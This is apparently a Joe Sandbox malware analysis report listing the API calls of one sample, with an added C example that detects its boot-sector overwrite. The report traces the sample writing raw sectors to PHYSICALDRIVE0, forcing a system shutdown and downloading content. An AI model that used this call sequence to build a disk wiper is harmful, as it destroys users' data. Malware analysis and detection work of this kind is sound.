                                                                  • API ID: Find$Filememset$Next_snprintf$AppendCloseCurrentDirectoryFirstInitializePathlstrcpystrncmpstrstrvsprintf
                                                                  • String ID: %s%s$.inf$RECYCLED
                                                                  • API String ID: 3870971729-188919753
                                                                  • Opcode ID: 7e7288f2f41a7029df25e8dec6f25fd5dd6afa16d558c9c312024b01c87ef185
                                                                  • Instruction ID: 046483317ee98d768293d9f4e58b829688ab387bf3925eaa1bb6bb150d169b95
                                                                  • Opcode Fuzzy Hash: 7e7288f2f41a7029df25e8dec6f25fd5dd6afa16d558c9c312024b01c87ef185
                                                                  • Instruction Fuzzy Hash: A94183BA94021CABCB26DB64DC85EEB737CEB54300F048598F90CA6144E674AFC5CB60
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036AA31
                                                                  • lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0036AA45
                                                                  • InternetOpenA.WININET(00000000,?,?,?,?), ref: 0036AA60
                                                                  • lstrlenA.KERNEL32(?), ref: 0036AA78
                                                                  • InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0036AA8C
                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 0036AAC0
                                                                  • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 0036AAE2
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AB15
                                                                  • InternetReadFile.WININET(00000000,?,00000FF8,00000001), ref: 0036AB67
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AB85
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0036ABA5
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0036ABE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$??2@OpenQuery$??3@AvailableCloseDataFileHandleHttpInfoReadlstrcpylstrlenmemset
                                                                  • String ID: Mozilla/4.0
                                                                  • API String ID: 2392773942-2634101963
                                                                  • Opcode ID: 59a30469ff1b8a69c1d33479d52b0dc1ceaef956b2935f41006aaca7caf68cbc
                                                                  • Instruction ID: ed71d7344c77238ad16aa33d4479489d6ec062e9d8c778bd7f6dbcde569ff9df
                                                                  • Opcode Fuzzy Hash: 59a30469ff1b8a69c1d33479d52b0dc1ceaef956b2935f41006aaca7caf68cbc
                                                                  • Instruction Fuzzy Hash: 86519E71A00245AFD722CF59DC84FAABBFCEB49300F04856DE909E7252D7789944CF61
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00373634,00000000,00000001,00373614,?), ref: 0036EE5B
                                                                  • memset.MSVCRT ref: 0036EE81
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036EE9A
                                                                  • lstrcatA.KERNEL32(00000000,00372C78), ref: 0036EEAE
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0036EEBB
                                                                  • memset.MSVCRT ref: 0036EED5
                                                                  • SHGetFileInfoA.SHELL32(?,00000000,00000000,00000160,00001000), ref: 0036EEF4
                                                                  • memset.MSVCRT ref: 0036EF68
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036EF7B
                                                                  • lstrcatA.KERNEL32(00000000,.lnk), ref: 0036EF89
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0036EFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatmemset$lstrcpy$ByteCharCreateFileInfoInstanceMultiWide
                                                                  • String ID: .lnk$shell32.dll
                                                                  • API String ID: 3196525290-3399515747
                                                                  • Opcode ID: db6c8e19bf646293cd08de28edbb93c97b761b5d25908a74eea31520765f6a71
                                                                  • Instruction ID: 990005829e6998115e4d84a27ef0e59086f6ae7bfac225a48b914291dd2b1715
                                                                  • Opcode Fuzzy Hash: db6c8e19bf646293cd08de28edbb93c97b761b5d25908a74eea31520765f6a71
                                                                  • Instruction Fuzzy Hash: EE512675A40218AFDB65DB94CC85FDAB3BDAF8C700F104588F608EB290D7B5AE45CB64
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036E8A0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036E8AD
                                                                  • _snprintf.MSVCRT ref: 0036E8D0
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0036E8FF
                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 0036E913
                                                                  • GetLastError.KERNEL32 ref: 0036E91D
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D7A0,00000000,00000000,00000000), ref: 0036E941
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036E94B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0036E96E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe$CloseConnectErrorHandleLastThread_snprintflstrlenmemset
                                                                  • String ID: 30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4065143564-1096776489
                                                                  • Opcode ID: d31acad39b633b431e1d10d34496e352472ea88846224be7f597e5883e3d1777
                                                                  • Instruction ID: 3cd32a5123ed202efaf8f5eafe7f4d40d98fae2e8a028a133d9cdaca75320ebf
                                                                  • Opcode Fuzzy Hash: d31acad39b633b431e1d10d34496e352472ea88846224be7f597e5883e3d1777
                                                                  • Instruction Fuzzy Hash: C82105767C03157AF33266784C87FAA765CAF14F21F648560FB08FD0C0DAF4694446A9
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00405844
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004058B9
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 004058CF
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,00000000,00000800,00000000), ref: 004058FC
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 00405970
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A05
                                                                    • Part of subcall function 004049F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,004073CC,00437C98,00000000,00000000,00000010,00000000), ref: 00404A10
                                                                    • Part of subcall function 004049F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00404A77
                                                                  • Sleep.KERNEL32(00000001), ref: 004059F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleInformationProcessQuery$CompareExchangeInterlockedMutexObjectReleaseSingleSleepWaitmemset
                                                                  • String ID: (mA$.`@$STFU
                                                                  • API String ID: 1902471319-61987734
                                                                  • Opcode ID: bca6671e6a5d14b828f609e28b7a034000451f6025cb8f49a12631a468eaa51f
                                                                  • Instruction ID: 732b757521710307399e601c09f1fe9508d0a5d5828f33180c83336337d0604a
                                                                  • Opcode Fuzzy Hash: bca6671e6a5d14b828f609e28b7a034000451f6025cb8f49a12631a468eaa51f
                                                                  • Instruction Fuzzy Hash: 4451A3B0A40215ABDB14DFA9CC45BAF77B8EB84710F14817AF945F62C0DB789E40CBA4
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00365844
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003658B9
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 003658CF
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,00000000,00000800,00000000), ref: 003658FC
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 00365970
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00365A05
                                                                    • Part of subcall function 003649F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003673CC,00397C98,00000000,00000000,00000010,00000000), ref: 00364A10
                                                                    • Part of subcall function 003649F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00364A77
                                                                  • Sleep.KERNEL32(00000001), ref: 003659F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleInformationProcessQuery$CompareExchangeInterlockedMutexObjectReleaseSingleSleepWaitmemset
                                                                  • String ID: (m7$.`6$STFU
                                                                  • API String ID: 1902471319-631095445
                                                                  • Opcode ID: 4135884fef37409fd97a8a00bf0f7ff8d3bd10d3f368d99827e806ae55bec7cd
                                                                  • Instruction ID: 0f7a50d8f918aeb4a50ac4b3a10e812c7c1af9caaad87b520788980438a94397
                                                                  • Opcode Fuzzy Hash: 4135884fef37409fd97a8a00bf0f7ff8d3bd10d3f368d99827e806ae55bec7cd
                                                                  • Instruction Fuzzy Hash: 4951C571E00615ABDB25DFA8CC45BAE77F8EB84710F14C169F949EB284EB749E40CB90
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00409DA7
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,20000080,00000000), ref: 00409DD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCreateFileVirtual
                                                                  • String ID: \\.\PHYSICALDRIVE0
                                                                  • API String ID: 1475775534-1557481562
                                                                  • Opcode ID: ffcd8f6330cbc774a61a6af0c0f4be1ea2cb921640cac86a5a12dedcfbeb7a29
                                                                  • Instruction ID: d500eae6f82fa0b336e9878c8502f6def019f67c4d7c2b81654dcf0d8b160c7b
                                                                  • Opcode Fuzzy Hash: ffcd8f6330cbc774a61a6af0c0f4be1ea2cb921640cac86a5a12dedcfbeb7a29
                                                                  • Instruction Fuzzy Hash: D931B87278030876F62056A9AC46FEB775CD788B32F204262FB08F91D1DAB06D4486F8
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00369DA7
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,20000080,00000000), ref: 00369DD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCreateFileVirtual
                                                                  • String ID: \\.\PHYSICALDRIVE0
                                                                  • API String ID: 1475775534-1557481562
                                                                  • Opcode ID: 8544bddec7bbd1bf05691a612eb7f58ae6884075bc8c938427130882b6f8af4b
                                                                  • Instruction ID: ba6f11b481e78d2c9b2800576740bcc79d0d2aaa5ec40241a11d2659241b1f46
                                                                  • Opcode Fuzzy Hash: 8544bddec7bbd1bf05691a612eb7f58ae6884075bc8c938427130882b6f8af4b
                                                                  • Instruction Fuzzy Hash: 3531B8727803047AF63156ADAC47FEB775CD784B32F204262FB08E91C0DAA1694487F4
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409EDF
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00409F16
                                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 00409F45
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 00409F5A
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 00409F74
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409F77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFile$CloseCreateHandleWritememset
                                                                  • String ID: 00100$U$\\.\PHYSICALDRIVE0
                                                                  • API String ID: 3939175881-3482488017
                                                                  • Opcode ID: d4a1ed7fe161a1ca99d4ffb7099c3cc08b8e683dc24901a62f0134f85c4f11e7
                                                                  • Instruction ID: c1763296a4acec64689325a2958d955e7f70efc6b3c63e6c8c8dbaef50afdc01
                                                                  • Opcode Fuzzy Hash: d4a1ed7fe161a1ca99d4ffb7099c3cc08b8e683dc24901a62f0134f85c4f11e7
                                                                  • Instruction Fuzzy Hash: DE11B631BC03187AF730A7649C0BFDAB66C8B59B11F100295F714BA1D1DAE42B4087A9
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00369EDF
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00369F16
                                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 00369F45
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 00369F5A
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 00369F74
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00369F77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFile$CloseCreateHandleWritememset
                                                                  • String ID: 00100$U$\\.\PHYSICALDRIVE0
                                                                  • API String ID: 3939175881-3482488017
                                                                  • Opcode ID: 53c87afece4fbe33683d82a1043323a21df8b336b82f9fa005b11470bf058a46
                                                                  • Instruction ID: 4c22e62fc13232181ed20a646a192a88c91a9dbbae1acf0ab315a7b964c73e9f
                                                                  • Opcode Fuzzy Hash: 53c87afece4fbe33683d82a1043323a21df8b336b82f9fa005b11470bf058a46
                                                                  • Instruction Fuzzy Hash: 8E11E732BD03187AF731E6A89C0BFDA776C8B55F11F104280F718BE1C19AE0274087A9
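The two blocks above are the same function seen in both dumps (image base 00400000, and the relocated copy at 00360000), and they are the call chain behind the "Contains functionality to infect the boot sector" signature: CreateFileA opens \\.\PHYSICALDRIVE0 with desired access C0000000 (GENERIC_READ | GENERIC_WRITE) and OPEN_EXISTING, DeviceIoControl 00090018 is FSCTL_LOCK_VOLUME, WriteFile writes 00000200 bytes (one 512-byte sector) with no SetFilePointer in between, so the write lands at offset 0, which is the MBR, DeviceIoControl 0009001C is FSCTL_UNLOCK_VOLUME, and CloseHandle releases the drive. The flags value 20000080 on the earlier CreateFileA in this dump decodes to FILE_FLAG_NO_BUFFERING | FILE_ATTRIBUTE_NORMAL, the usual way to write raw sectors. The following is an added example, not code from the report or from the sample: it decodes the raw IOCTL codes with the documented CTL_CODE() bit layout and classifies a call sequence as a boot-sector overwrite. The `raw_disk_sequence` struct and `is_boot_sector_overwrite` are this example's own names; the constants are the winnt.h / winioctl.h values, redefined so the code builds without Windows headers.

```c
/* Added example, not part of the Joe Sandbox report or the sample: decode the
 * raw argument values shown for the \\.\PHYSICALDRIVE0 call chain
 * (CreateFileA -> DeviceIoControl 00090018 -> WriteFile 00000200 bytes ->
 * DeviceIoControl 0009001C -> CloseHandle). Plain C with no Windows headers;
 * the constants reproduce the documented winnt.h/winioctl.h values and the
 * CTL_CODE() bit layout, so it builds and runs on any host. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CTL_CODE(DeviceType, Function, Method, Access) =
 *   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method      */
typedef struct { unsigned device_type, access, function, method; } ioctl_parts;

static ioctl_parts decode_ioctl(uint32_t code)
{
    ioctl_parts p;
    p.device_type = (code >> 16) & 0xFFFF;
    p.access      = (code >> 14) & 0x3;
    p.function    = (code >> 2)  & 0xFFF;
    p.method      =  code        & 0x3;
    return p;
}

#define FILE_DEVICE_FILE_SYSTEM 0x00000009u
#define METHOD_BUFFERED         0u
#define FILE_ANY_ACCESS         0u

/* Names for the FSCTLs that matter when user mode writes a raw disk. */
static const char *fsctl_name(uint32_t code)
{
    ioctl_parts p = decode_ioctl(code);
    if (p.device_type != FILE_DEVICE_FILE_SYSTEM || p.method != METHOD_BUFFERED ||
        p.access != FILE_ANY_ACCESS)
        return "not a buffered FILE_SYSTEM FSCTL";
    switch (p.function) {
    case 6:  return "FSCTL_LOCK_VOLUME";
    case 7:  return "FSCTL_UNLOCK_VOLUME";
    case 8:  return "FSCTL_DISMOUNT_VOLUME";
    default: return "other FSCTL";
    }
}

/* CreateFileA argument values as they appear in the report. */
#define GENERIC_READ            0x80000000u
#define GENERIC_WRITE           0x40000000u
#define OPEN_EXISTING           3u
#define FILE_FLAG_NO_BUFFERING  0x20000000u

/* Hypothetical record of one observed call chain (this example's own type). */
typedef struct {
    uint32_t desired_access;      /* 2nd CreateFileA argument */
    uint32_t creation;            /* 5th CreateFileA argument */
    uint32_t flags;               /* 6th CreateFileA argument */
    uint32_t ioctl_before_write;  /* DeviceIoControl code issued before WriteFile */
    uint32_t write_len;           /* nNumberOfBytesToWrite */
    int      seek_before_write;   /* 1 if SetFilePointer(Ex) was seen first */
    uint32_t ioctl_after_write;   /* DeviceIoControl code issued after WriteFile */
} raw_disk_sequence;

/* Returns 1 when the chain matches lock / overwrite sector 0 / unlock on a
 * physical drive: writable handle, FSCTL_LOCK_VOLUME, a 512-byte write with
 * no prior seek (so it lands on LBA 0, the MBR), then FSCTL_UNLOCK_VOLUME.
 * A generic classifier of the call chain, not a reimplementation of the sample. */
static int is_boot_sector_overwrite(const raw_disk_sequence *s)
{
    if (!(s->desired_access & GENERIC_WRITE)) return 0;
    if (s->creation != OPEN_EXISTING) return 0;
    if (strcmp(fsctl_name(s->ioctl_before_write), "FSCTL_LOCK_VOLUME") != 0) return 0;
    if (s->seek_before_write || s->write_len != 512) return 0;
    if (strcmp(fsctl_name(s->ioctl_after_write), "FSCTL_UNLOCK_VOLUME") != 0) return 0;
    return 1;
}

int main(void)
{
    /* Values copied from the report's APIs list for the function above. */
    raw_disk_sequence from_report = {
        GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING, 0, 0x90018, 0x200, 0, 0x9001C };
    /* Constructed counter-example: a read-only, unbuffered sector read. */
    raw_disk_sequence benign_read = {
        GENERIC_READ, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, 0, 0x200, 0, 0 };

    printf("00090018 = %s\n", fsctl_name(0x90018));
    printf("0009001C = %s\n", fsctl_name(0x9001C));
    printf("report sequence: %s\n",
           is_boot_sector_overwrite(&from_report) ? "boot sector overwrite" : "no match");
    printf("read-only sequence: %s\n",
           is_boot_sector_overwrite(&benign_read) ? "boot sector overwrite" : "no match");
    return 0;
}
```

The classifier is deliberately narrow: the later block in this dump that writes 00008000 bytes and then issues the same 0009001C unlock is a larger raw-disk write whose open and offset the report does not show, so it is not matched here. On a live host the equivalent check is to alert on any non-system process obtaining a GENERIC_WRITE handle to \\.\PHYSICALDRIVEn at all; the lock/unlock pair is only what a careful writer does around it.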
                                                                  APIs
                                                                  • printf.MSVCRT ref: 004034A0
                                                                  • printf.MSVCRT ref: 004034AD
                                                                  • printf.MSVCRT ref: 004034CC
                                                                  • NtAllocateVirtualMemory.NTDLL(00000000,?,00000000,00437A80,00003000,00000040), ref: 004034F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: printf$AllocateMemoryVirtual
                                                                  • String ID: Done frst$block_size: %d$ngr->blocksize: %d
                                                                  • API String ID: 3635587295-1816125109
                                                                  • Opcode ID: 97c15441b68f69641c94349759af36be741f732a192bd59ec89c2944423630dc
                                                                  • Instruction ID: a515e188e62a96647e9cbe95b5ca16a3a4a6047310d6757b3ddcde311f3628c1
                                                                  • Opcode Fuzzy Hash: 97c15441b68f69641c94349759af36be741f732a192bd59ec89c2944423630dc
                                                                  • Instruction Fuzzy Hash: 0941F571A00204ABCB14DF59CC45E9A7BADEF84329F14856FF9099B391E638EE41CB94
                                                                  APIs
                                                                  • printf.MSVCRT ref: 003634A0
                                                                  • printf.MSVCRT ref: 003634AD
                                                                  • printf.MSVCRT ref: 003634CC
                                                                  • NtAllocateVirtualMemory.NTDLL(00000000,?,00000000,00397A80,00003000,00000040), ref: 003634F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: printf$AllocateMemoryVirtual
                                                                  • String ID: Done frst$block_size: %d$ngr->blocksize: %d
                                                                  • API String ID: 3635587295-1816125109
                                                                  • Opcode ID: 05ca3ff0ed4bcba6f8f49bcff08588da3d11a9856301168d07a0f9e808161f77
                                                                  • Instruction ID: 8fab25400cc0c5132a58c3f167d075cc290fe7108d36398906e43025aae408bc
                                                                  • Opcode Fuzzy Hash: 05ca3ff0ed4bcba6f8f49bcff08588da3d11a9856301168d07a0f9e808161f77
                                                                  • Instruction Fuzzy Hash: D9410575A00204AFCB16DF69C846E9AB7A9EF84324F14C55DF90D8B249EB35EF01CB90
                                                                  APIs
                                                                    • Part of subcall function 00403920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00403962
                                                                    • Part of subcall function 00403750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0040376B
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,ntdll.dll,NtShutdownSystem), ref: 0040A57A
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040A58F
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040A5B3
                                                                  • GetLastError.KERNEL32 ref: 0040A5B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: StringToken$AddressAdjustAnsiErrorLastLookupOpenPrivilegePrivilegesProcedureProcessUnicodeValue
                                                                  • String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
                                                                  • API String ID: 4135695518-1699316426
                                                                  • Opcode ID: c995f3c1d0a724f36528810c0480acc16cd25410b87a2cccc31b0e10fa1897df
                                                                  • Instruction ID: 41268f7d111cdba9b222163e3203631acf71579276c4fa84ae79774109ae6c2c
                                                                  • Opcode Fuzzy Hash: c995f3c1d0a724f36528810c0480acc16cd25410b87a2cccc31b0e10fa1897df
                                                                  • Instruction Fuzzy Hash: EFF08675E403047BD710EBE59D0AFEF7BAC9B08705F104026B604F61D1DAF46A448BA9
                                                                  APIs
                                                                    • Part of subcall function 00363920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00363962
                                                                    • Part of subcall function 00363750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0036376B
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,ntdll.dll,NtShutdownSystem), ref: 0036A57A
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0036A58F
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0036A5B3
                                                                  • GetLastError.KERNEL32 ref: 0036A5B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: StringToken$AddressAdjustAnsiErrorLastLookupOpenPrivilegePrivilegesProcedureProcessUnicodeValue
                                                                  • String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
                                                                  • API String ID: 4135695518-1699316426
                                                                  • Opcode ID: 350b54479aa84f554cd6323ba044ac2d77b64063104259ca8f6593464f6c12d5
                                                                  • Instruction ID: 773b607be1bb5ac7de4fee39e4e002afb8d01efc9d35bd2824981dd6eb46e3da
                                                                  • Opcode Fuzzy Hash: 350b54479aa84f554cd6323ba044ac2d77b64063104259ca8f6593464f6c12d5
                                                                  • Instruction Fuzzy Hash: D2F0A476A403047BE721EBE89C0BFEF77AC9B04B00F108004F609FA1C5DEB06A448BA1
                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00364E7E,SeDebugPrivilege,00000001,00000000,ntdll.dll,NtGetNextProcess), ref: 00364C32
                                                                  • GetLastError.KERNEL32 ref: 00364C3C
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00364C52
                                                                  • GetLastError.KERNEL32 ref: 00364C5C
                                                                  • CloseHandle.KERNEL32(?), ref: 00364C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseHandleLookupOpenPrivilegeProcessTokenValue
                                                                  • String ID:
                                                                  • API String ID: 1673749002-0
                                                                  • Opcode ID: bab72ac6c93dfc6c1d4ce536cb2640832666144c0450ba6632b5312c280833c5
                                                                  • Instruction ID: 86aa566cee1c97aa597bef922b533b604b9e90c8c93a1de2fa20620043c5b14d
                                                                  • Opcode Fuzzy Hash: bab72ac6c93dfc6c1d4ce536cb2640832666144c0450ba6632b5312c280833c5
                                                                  • Instruction Fuzzy Hash: 3E118676A10208ABDB21DFE8DD0DFAEB7BCEB49701F404549FE0DD7240EA71994487A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8b93125eba8910506b40e9ba5b4385cef48a0e054bcb804f68244df297e9a45
                                                                  • Instruction ID: 942ce6274c200554a49d74525d88e97118f562e65eab34f5e31120a6708bfbdc
                                                                  • Opcode Fuzzy Hash: c8b93125eba8910506b40e9ba5b4385cef48a0e054bcb804f68244df297e9a45
                                                                  • Instruction Fuzzy Hash: EB31A475B003046BD7329F6AEC41F6BB3ADEB80711F258559FD09D7384EA71EC1086A0
                                                                  APIs
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 00365741
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 0036578B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InformationQuerySystem
                                                                  • String ID: (m7
                                                                  • API String ID: 3562636166-2716958383
                                                                  • Opcode ID: c86ca335198586971830259d0150735b7467204357c4a947286d54eb30c6aacb
                                                                  • Instruction ID: 6a7b06e9c0514afae4573d3a2dba231199cec1e3188b114992121cb2529e51ac
                                                                  • Opcode Fuzzy Hash: c86ca335198586971830259d0150735b7467204357c4a947286d54eb30c6aacb
                                                                  • Instruction Fuzzy Hash: C0416E75A00619ABDB21CFA4DC81FBEB3B8EB88704F158568E905E7244E774ED50CBA0
                                                                  APIs
                                                                  Memory Dump Source
